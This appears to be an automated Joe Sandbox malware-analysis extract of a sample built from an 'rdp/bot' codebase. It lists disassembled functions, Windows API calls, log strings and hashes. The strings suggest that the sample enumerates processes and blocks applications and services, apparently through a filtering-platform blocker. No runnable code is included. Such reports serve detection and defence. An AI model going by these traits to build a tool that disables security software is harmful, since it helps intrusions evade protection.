[I] (%s) -> Done(szExeFile=%s,th32ProcessID=%d), xrefs: 00007FF73AFB8A32
app, xrefs: 00007FF73AFB858D
[E] (%s) -> OpenProcess failed(szExeFile=%s,gle=%lu), xrefs: 00007FF73AFB8A8F
[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF73AFB8694
block_app, xrefs: 00007FF73AFB868D, 00007FF73AFB86CC, 00007FF73AFB87B7, 00007FF73AFB8939, 00007FF73AFB8A2B, 00007FF73AFB8A88
[E] (%s) -> QueryFullProcessImageNameW failed(gle=%lu), xrefs: 00007FF73AFB8940
[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu), xrefs: 00007FF73AFB86D3
[E] (%s) -> Process32First failed(gle=%lu), xrefs: 00007FF73AFB87BE

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: ErrorLast$Process$CloseFullHandleImageNameNextOpenProcess32Querystrcmp
String ID: [E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> OpenProcess failed(szExeFile=%s,gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> QueryFullProcessImageNameW failed(gle=%lu)$[I] (%s) -> Done(szExeFile=%s,th32ProcessID=%d)$app$block_app
API String ID: 1025937399-1899507746
Opcode ID: 451e17b2126774e296031818a113e861369deb4a1fb95e9d8082199e12eb9c46
Instruction ID: 791aa248b5f48bf6f768ce1002fd20922d2b31bb2b393cfdea6caf4ead9b2e04
Opcode Fuzzy Hash: 451e17b2126774e296031818a113e861369deb4a1fb95e9d8082199e12eb9c46
Instruction Fuzzy Hash: FBF1399EF0C713B2FA707614A4C23BC9261AFC9754FD004B2C64E066D5CE6DEC85B6A6

Function 00007FF73AFB1131 Relevance: 13.6, APIs: 9, Instructions: 120
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,00007FF73AFB1313), ref: 00007FF73AFB116E
_amsg_exit.MSVCRT(?,?,?,00007FF73AFB1313), ref: 00007FF73AFB118D
_initterm.MSVCRT ref: 00007FF73AFB11AE
_initterm.MSVCRT ref: 00007FF73AFB11D3
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF73AFB1212
malloc.MSVCRT ref: 00007FF73AFB1244
strlen.MSVCRT ref: 00007FF73AFB125C
malloc.MSVCRT ref: 00007FF73AFB1268
_cexit.MSVCRT(?,?,?,00007FF73AFB1313), ref: 00007FF73AFB12E3

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
String ID:
API String ID: 3714283218-0
Opcode ID: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
Instruction ID: 71ea4997a95e2493c735257ea57223191fa3145fa9e3a2453d405c591afe1951
Opcode Fuzzy Hash: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
Instruction Fuzzy Hash: 6E516E2DE08707AAFB51BB12D852279A3A5BF44B84F8449B5CD4E473A6DF3CE441A320

Function 00007FF73AFB45D5 Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 298
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fopen.MSVCRT ref: 00007FF73AFB461A
fseek.MSVCRT ref: 00007FF73AFB4639
_errno.MSVCRT ref: 00007FF73AFB464D
_errno.MSVCRT ref: 00007FF73AFB4668
_errno.MSVCRT ref: 00007FF73AFB4727

Part of subcall function 00007FF73AFB14E2: fwrite.MSVCRT ref: 00007FF73AFB158E
Part of subcall function 00007FF73AFB14E2: fflush.MSVCRT ref: 00007FF73AFB159A

_errno.MSVCRT ref: 00007FF73AFB4742
_errno.MSVCRT ref: 00007FF73AFB478F
fclose.MSVCRT ref: 00007FF73AFB4B30

Strings

mem_alloc, xrefs: 00007FF73AFB49F4
(buf_sz != NULL), xrefs: 00007FF73AFB46C9
[E] (%s) -> fopen failed(path=%s,errno=%d), xrefs: 00007FF73AFB4736
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB4B6C
NULL, xrefs: 00007FF73AFB4B99
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF73AFB468F, 00007FF73AFB46C2, 00007FF73AFB46F5
[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d), xrefs: 00007FF73AFB465C
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB46A4, 00007FF73AFB46D7, 00007FF73AFB470A
[E] (%s) -> fread failed(path=%s,errno=%d), xrefs: 00007FF73AFB4A22
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF73AFB49FB
[E] (%s) -> ftell failed(path=%s,errno=%d), xrefs: 00007FF73AFB4841
(path != NULL), xrefs: 00007FF73AFB4696
(((*buf) == NULL) || ((*buf_sz) > 0)), xrefs: 00007FF73AFB46FC
[I] (%s) -> Done(path=%s,buf_sz=%llu), xrefs: 00007FF73AFB4BAF
[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d), xrefs: 00007FF73AFB4957
fs_file_read, xrefs: 00007FF73AFB4655, 00007FF73AFB469D, 00007FF73AFB46D0, 00007FF73AFB4703, 00007FF73AFB472F, 00007FF73AFB483A, 00007FF73AFB4950, 00007FF73AFB4A1B, 00007FF73AFB4ADA, 00007FF73AFB4B65, 00007FF73AFB4BA8
[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld), xrefs: 00007FF73AFB4AE1

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: _errno$fclosefflushfopenfseekfwrite
String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
API String ID: 2897271634-4120527733
Opcode ID: 8d3f3eb794060db9cd3f9f47aaa0e190f23ddfc4264be86883100ac6011f60cc
Instruction ID: ced1c65b2f9db5736e04c4638bdce0ef40ec3fcbce354e22784ee313de3cfc5f
Opcode Fuzzy Hash: 8d3f3eb794060db9cd3f9f47aaa0e190f23ddfc4264be86883100ac6011f60cc
Instruction Fuzzy Hash: 5ED1A42EA08B07B1FA20BB16E9423B9E361BF557C6FD455B1C94D472A4DE3CE445A320

Function 00007FF73AFB433B Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fopen.MSVCRT ref: 00007FF73AFB4363
_errno.MSVCRT ref: 00007FF73AFB444F
_errno.MSVCRT ref: 00007FF73AFB4470
fwrite.MSVCRT ref: 00007FF73AFB44E4

Strings

fs_file_write, xrefs: 00007FF73AFB43C5, 00007FF73AFB43FB, 00007FF73AFB442B, 00007FF73AFB445D, 00007FF73AFB450D, 00007FF73AFB45BD
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF73AFB43ED, 00007FF73AFB441D
[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu), xrefs: 00007FF73AFB45C4
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB4402, 00007FF73AFB4432
NULL, xrefs: 00007FF73AFB459A, 00007FF73AFB45A6
(path != NULL), xrefs: 00007FF73AFB43F4
[E] (%s) -> Failed(path=%s,mode=%s,err=%08x), xrefs: 00007FF73AFB43CC
[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d), xrefs: 00007FF73AFB4464
(mode != NULL), xrefs: 00007FF73AFB4424
[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d), xrefs: 00007FF73AFB4514

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: _errno$fopenfwrite
String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
API String ID: 1336347884-544371937
Opcode ID: a79df390d3912f5b32168f92cd7dad998d71310a32bbd5bb8ef24f85192d125c
Instruction ID: 2544ea85969262c6b89478a92677805ce162b4a2a9cb9909787753383bc0d428
Opcode Fuzzy Hash: a79df390d3912f5b32168f92cd7dad998d71310a32bbd5bb8ef24f85192d125c
Instruction Fuzzy Hash: A851876EA08B43B1FA20BB56D9421F8E361AF547D5FD806B5D94D472D0DE3CE506B320

Function 00007FF73AFB168C Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF73AFB16AC
GetLastError.KERNEL32 ref: 00007FF73AFB17E0

Part of subcall function 00007FF73AFB19C0: GetModuleHandleExA.KERNEL32 ref: 00007FF73AFB19DE

strlen.MSVCRT ref: 00007FF73AFB16FE
strlen.MSVCRT ref: 00007FF73AFB171A
strcat.MSVCRT ref: 00007FF73AFB1735
strlen.MSVCRT ref: 00007FF73AFB173D
strlen.MSVCRT ref: 00007FF73AFB1752
fopen.MSVCRT ref: 00007FF73AFB1778

Strings

[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FF73AFB17F2
Done, xrefs: 00007FF73AFB191D
wfpblk.l, xrefs: 00007FF73AFB175A
log, xrefs: 00007FF73AFB1767
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FF73AFB17A5
[I] (%s) -> %s, xrefs: 00007FF73AFB192B
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FF73AFB18B7
[E] (%s) -> Failed(err=%08x), xrefs: 00007FF73AFB17CA
debug_init, xrefs: 00007FF73AFB179E, 00007FF73AFB17C3, 00007FF73AFB17EB, 00007FF73AFB18B0, 00007FF73AFB1924

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$wfpblk.l
API String ID: 3395718042-2291025694
Opcode ID: 0575ea90b9a249bda34d0c2615eb243f4fb3da11506d59fd67d1a91776af8205
Instruction ID: bed3723b3c5a7665cba164ebd8665164ffb451ede312f233a4d361f363a0ca3f
Opcode Fuzzy Hash: 0575ea90b9a249bda34d0c2615eb243f4fb3da11506d59fd67d1a91776af8205
Instruction Fuzzy Hash: A7515F6CE0C703B2F7247B42A4923B9D265AF05784FE005B2C54E072A6DF2DF946E365

Function 00007FF73AFB5E6F Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 199
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32 ref: 00007FF73AFB5EC7
LockFileEx.KERNEL32 ref: 00007FF73AFB5F00
GetLastError.KERNEL32 ref: 00007FF73AFB5FD5
GetLastError.KERNEL32 ref: 00007FF73AFB60BA
CloseHandle.KERNEL32 ref: 00007FF73AFB622E

Strings

fs_file_lock, xrefs: 00007FF73AFB5F54, 00007FF73AFB5F88, 00007FF73AFB5FB8, 00007FF73AFB5FE3, 00007FF73AFB60C8, 00007FF73AFB624B
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF73AFB5F7A, 00007FF73AFB5FAA
[I] (%s) -> Done(path=%s,lock=%p), xrefs: 00007FF73AFB6252
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB5F8F, 00007FF73AFB5FBF
NULL, xrefs: 00007FF73AFB6239
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB5F5B
[E] (%s) -> CreateFileA failed(path=%s,gle=%lu), xrefs: 00007FF73AFB5FEA
[E] (%s) -> LockFileEx failed(path=%s,gle=%lu), xrefs: 00007FF73AFB60CF
(path != NULL), xrefs: 00007FF73AFB5F81
(lock != NULL), xrefs: 00007FF73AFB5FB1

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleLock
String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock
API String ID: 2747014929-530486279
Opcode ID: 9b3c507542046c270dad83cd5fdb2f0c0c18587aa81483e3ae0ddb416e6db33f
Instruction ID: 755c8b4d1bc4aafbbe12295789c81e9995460e8832c6b8b9aaeed2c1f74242c0
Opcode Fuzzy Hash: 9b3c507542046c270dad83cd5fdb2f0c0c18587aa81483e3ae0ddb416e6db33f
Instruction Fuzzy Hash: F9819128E0C70BA1FE70B741A4463B8E2609F10755FD406B2DA6F076D5EF6DE985B322

Function 00007FF73AFB97F2 Relevance: 25.7, APIs: 7, Strings: 10, Instructions: 241
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF73AFB983D
HeapFree.KERNEL32 ref: 00007FF73AFB984E

Part of subcall function 00007FF73AFB45D5: fopen.MSVCRT ref: 00007FF73AFB461A
Part of subcall function 00007FF73AFB45D5: fseek.MSVCRT ref: 00007FF73AFB4639
Part of subcall function 00007FF73AFB45D5: _errno.MSVCRT ref: 00007FF73AFB464D
Part of subcall function 00007FF73AFB45D5: _errno.MSVCRT ref: 00007FF73AFB4668

GetProcessHeap.KERNEL32 ref: 00007FF73AFB997A
HeapAlloc.KERNEL32 ref: 00007FF73AFB998B
strncpy.MSVCRT ref: 00007FF73AFB9ACC
strncpy.MSVCRT ref: 00007FF73AFB9AE3
strncpy.MSVCRT ref: 00007FF73AFB9B42

Part of subcall function 00007FF73AFB14E2: fwrite.MSVCRT ref: 00007FF73AFB158E
Part of subcall function 00007FF73AFB14E2: fflush.MSVCRT ref: 00007FF73AFB159A

Strings

[I] (%s) -> Done(path=%s), xrefs: 00007FF73AFB9BA8
NULL, xrefs: 00007FF73AFB9B92
mem_alloc, xrefs: 00007FF73AFB99D3
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF73AFB99DA
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF73AFB98AD
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF73AFB98C2
5, xrefs: 00007FF73AFB98A5
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF73AFB9886
ini_load, xrefs: 00007FF73AFB987F, 00007FF73AFB98BB, 00007FF73AFB9BA1
(path != NULL), xrefs: 00007FF73AFB98B4

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
API String ID: 1423203057-2746879330
Opcode ID: 3376151e42566418d02346fbad8dfbff69277db5febdca2b74525d6dbb244e7f
Instruction ID: f58c3c751085e5f45a66eee2f7d9a069bb67988f2f2db38d665e6158a9f8a01b
Opcode Fuzzy Hash: 3376151e42566418d02346fbad8dfbff69277db5febdca2b74525d6dbb244e7f
Instruction Fuzzy Hash: 55A1D26AA0D783A5FA20AB06E4827B9E770EF41784FC844B2DD8D07681DF3CE545E320

Function 00007FF73AFB9181 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 00007FF73AFB8EEF
GetProcessHeap.KERNEL32 ref: 00007FF73AFB8F6B
HeapAlloc.KERNEL32 ref: 00007FF73AFB8F7C
BuildTrusteeWithSidW.ADVAPI32 ref: 00007FF73AFB9010
BuildSecurityDescriptorW.ADVAPI32 ref: 00007FF73AFB905D
GetProcessHeap.KERNEL32 ref: 00007FF73AFB90F2
HeapFree.KERNEL32 ref: 00007FF73AFB9103

Strings

[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu), xrefs: 00007FF73AFB9077
block_svc, xrefs: 00007FF73AFB9070

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
API String ID: 493744553-3317923414
Opcode ID: 95658512ede4fbe6618f08f0f1df587a951955726cdba6d0e9aac23c48af3557
Instruction ID: 859556a9658935cbcc92c93e8fb599bf399d5ffbf53a9d7f07e8e0ba5a9fc85e
Opcode Fuzzy Hash: 95658512ede4fbe6618f08f0f1df587a951955726cdba6d0e9aac23c48af3557
Instruction Fuzzy Hash: 6051583A608BC396F770AB51E4853AAB7A0FB84744F804135CA8D43B99EF3DD549DB50

Function 00007FF73AFB9195 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 00007FF73AFB8EEF
GetProcessHeap.KERNEL32 ref: 00007FF73AFB8F6B
HeapAlloc.KERNEL32 ref: 00007FF73AFB8F7C
BuildTrusteeWithSidW.ADVAPI32 ref: 00007FF73AFB9010
BuildSecurityDescriptorW.ADVAPI32 ref: 00007FF73AFB905D
GetProcessHeap.KERNEL32 ref: 00007FF73AFB90F2
HeapFree.KERNEL32 ref: 00007FF73AFB9103

Strings

[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu), xrefs: 00007FF73AFB9077
block_svc, xrefs: 00007FF73AFB9070

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
API String ID: 493744553-3317923414
Opcode ID: e2b3ca7857d0e400822bdb59731b43772205076eaf0c2f53e8d8b8da3f81ba71
Instruction ID: 0fd78958cc191fe0d78209e3217b3e0ebb0adbf142545ff0c2f5a0fa41564cfa
Opcode Fuzzy Hash: e2b3ca7857d0e400822bdb59731b43772205076eaf0c2f53e8d8b8da3f81ba71
Instruction Fuzzy Hash: B751573A608BC396F770AB51E4853AAB7A0FB84744F804135CA8D43B99EF3DD549DB50

Function 00007FF73AFB918B Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 00007FF73AFB8EEF
GetProcessHeap.KERNEL32 ref: 00007FF73AFB8F6B
HeapAlloc.KERNEL32 ref: 00007FF73AFB8F7C
BuildTrusteeWithSidW.ADVAPI32 ref: 00007FF73AFB9010
BuildSecurityDescriptorW.ADVAPI32 ref: 00007FF73AFB905D
GetProcessHeap.KERNEL32 ref: 00007FF73AFB90F2
HeapFree.KERNEL32 ref: 00007FF73AFB9103

Strings

[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu), xrefs: 00007FF73AFB9077
block_svc, xrefs: 00007FF73AFB9070

Memory Dump Source

Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true

Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd

Similarity

API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
API String ID: 493744553-3317923414
Opcode ID: 14e55ba5be5b0934ddbeb236a4762f3caeeab83ccb12abe0d60990accc268619
Instruction ID: 80b2dd1a26a6001f9ce48cbdcd20045eb0c37ffcce0df327dfb069deb25c8eaf
Opcode Fuzzy Hash: 14e55ba5be5b0934ddbeb236a4762f3caeeab83ccb12abe0d60990accc268619
